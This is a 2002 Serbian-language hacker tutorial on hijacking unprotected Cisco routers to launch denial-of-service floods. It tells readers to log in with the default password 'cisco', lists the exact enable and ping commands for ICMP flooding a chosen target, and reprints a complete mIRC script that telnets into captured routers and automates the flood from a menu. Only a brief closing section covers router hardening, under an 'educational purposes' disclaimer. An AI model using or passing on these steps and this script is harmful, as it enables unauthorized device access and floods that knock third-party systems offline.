Naziv: DDoS uz pomoc nezasticenih Cisco rutera Autor: BaCkSpAcE BitByterz Labs 2002 SADRZAJ: =-=-=-=-= \x00 Uvod \x01 Kako provaliti u ruter? \x02 Provalio sam u ruter.... sta dalje? \x03 IRC BOT za DDoS uz pomoc rutera.... \x04 Zastita rutera \x05 Kraj =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= \x00 Uvod =-=-=-=-=-= Kao sto znamo, da bi DoS-ovali (Denial of Service) neku masinu potrebno je da imamo vise kompjutera - zombija koji bi nam pomogli, jer ako bi samo jedan covek DoSovao, onda to ne bi imalo efekta - bio bi to napad sa mozda nekih 3-5 Kb/s posto bi to najverovatnije bila neka 56k konekcija. Kada bi prikupili 50 zombija, onda bi to bilo vec bolje... 50 x ~4kb/s ~= 200 Kb/s... Za takvo nesto bi nam trebalo puno, puno vremena... Ali, uvek ono ali... Postoji jedan relativno laksi metod za floodovanje protokom od 200 Kb/s. Potrebno je "samo" provaliti u jedan ruter... \x01 Kako provaliti u ruter? =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Provaljivanje u rutere je obicno mnogo teze od obicnih web-servera, jer je za njih otkriveno veoma malo bugova... Zato bi najbolje bilo da trazite neke Cisco rutere jer je za njih otkriveno vise bugova, popularniji su, i samim tim su oduvek privlacili vecu paznju od ostalih rutera... Pri bilo kakvom pokusaju provaljivanja u Cisco rutere, uvek pokusajte pristupiti koristeci default password: cisco. Ako vam ovo neuspe, onda morate potraziti neki exploit pa pokusati nesto vise da izvucete.... \x02 Provalio sam u ruter.... sta dalje? =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Najtezi posao je obavljen. Ostaje nam samo da ukucamo nekoliko komandi i gotovo... Evo redosleda: 1. Za password ukucati 'cisco' 2. Zatim otkucati 'enable' da bi usli u privilegovan mod.... 3. Zatim otkucati ponovo password 'cisco' ako bude ruter to zatrazio 4. Komandom 'ping' pokrecemo process DoSovanja... Tekst koji sledi oznacava komande koje treba ukucati nakon komande 'ping': 'ip' - protokol '127.0.0.1' - destinaciona adresa koju morate promeniti... '1000' - koliko puta pingovati host '2500' - velicina ICMP paketa, koja ne moze biti veca od 18024 '50' - zastoj izmedju dva paketa pri slanju, staviti 0 za flooding 'n' - otkucati 'n' 'n' - opet otkucati 'n', a ako otkucate 'y' dobicete jos neke parametre Sada ce ruter poceti sa ICMP floodingom na specifirani host. \x03 IRC BOT za DDoS uz pomoc rutera.... [preuzeto od Hal ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= E, sada jedan slag na tortu (a gde je tu torta ;) Ovaj nas ruter bi mogli da iskoristimo uz ovu skriptu za mIRC koju je uradio Hal . Naime, ova skripta automatizuje proces floodovanja, odnosno svodi ga na dva klika mishem, naravno, ako imate osvojen bar jedan ruter... Evo kako bi izgledala ta skripta: alias cisco { inc %cisco.open | sockopen cisco [ $+ [ %cisco.open ] ] $1 23 } alias cisco-clr { set %cisco.open 0 | sockclose cisco* | set %cisco.nuke.notice on } on 1:sockopen:cisco*:{ .timer 1 1 sockwrite -n $sockname cisco .timer 1 1 sockwrite -n $sockname enable .timer 1 1 sockwrite -n $sockname cisco .timer 1 1 sockwrite -n $sockname ping .timer 1 1 sockwrite -n $sockname ip .timer 1 1 sockwrite -n $sockname %newk.ip .timer 1 1 sockwrite -n $sockname %pngtimes .timer 1 1 sockwrite -n $sockname %psize .timer 1 1 sockwrite -n $sockname %delay .timer 1 1 sockwrite -n $sockname n .timer 1 1 sockwrite -n $sockname n } alias cisco-w { window -naek0 @Cisco /cisco Arial 12 } menu channel { - [Cisco] .Flood IP [ %newk.ip ]:/set %newk.ip $$?="Enter IP to flood " | /echo -a *** Done now type /cisco routerip to begin flooding .Set Times To Ping a Target [ %pngtimes ]:/set %pngtimes $$?="Times to send a ping" | /echo -a Done .Set ICMP Packet Size [ %psize ]:/set %psize $$?="ICMP packet size (must be between 30 and 18024)" | /echo -a Done .Set Delay Between Packets [ %delay ]:/set %delay $$?="Delay Between ICMPs in Secs (0 for flooding)" | /echo -a Done .- .Stop Flooding:/cisco-clr .- } on *:sockread:cisco*:{ if ($sockerr > 0) return sockread %cisco if ($window(@cisco,1) == $null) { cisco-w | goto next } :next if (send isin %cisco) && (%cisco != $null) { echo @cisco %cisco } if ($chr(33) isin %cisco) { echo @cisco $sock($sockname).ip - %cisco } else { halt } } ;telnet alias telnet { set %telnet.n $2 sockopen telnet %telnet.n 23 echo @telnet -Connecting- } alias telnet-w { window -naek0 @Telnet Terminal 12 } on 1:input:@telnet:{ if ($1 == /telnet) && ($2) && (!$sock(telnet).ip) { telnet $1- } if ($1 == /telnet) && ($sock(telnet).ip) { echo @telnet -Already Connected to $sock(telnet).ip $+ - } elseif ($sock(telnet).ip) { sockwrite -n telnet $1- | echo @telnet -> $1- } } on 1:sockopen:telnet:{ echo @telnet *** CONNECTING } on 1:sockclose:telnet:{ echo @telnet *** DISCONNECTED } on 1:sockread:telnet:{ if ($sockerr > 0) return sockread %telnet if ($window(@telnet,1) == $null) { telnet-w | goto next } :next if (%telnet != $null) { echo @telnet %telnet } } menu @telnet { connect:/sockopen telnet $$?="Enter Ip" disconnect:/sockclose telnet | echo @telnet *** DISCONNECTED \x04 Zastita rutera =-=-=-=--=-=-=-=-=-=-= Da bi zastitili vas ruter od ovih napada, potrebno je da izbrisete sve default passworde koji dolaze uz ruter... oni su najveca pretnja svakom adminu. Normalno, update softvera i ogranicavanje protoka bi odradili dobar deo posla. Danasnji ruteri su uglavnom zasticeni, ali uvek ima izuzetaka... \x05 Kraj =-=-=-=-=-= Ne znam da li sam napomenuo na pocetku teksta, ali... ovo je sve u edukativne svrhe, i sve sto je napisano, isprobano je na uredjajima na kojima sam imao legalan pristup i dozvole vlasnika. Pozdravi idu svim hackerima, phreakerima i crackerima ma gde god da su... (i onima koji se tako osecaju)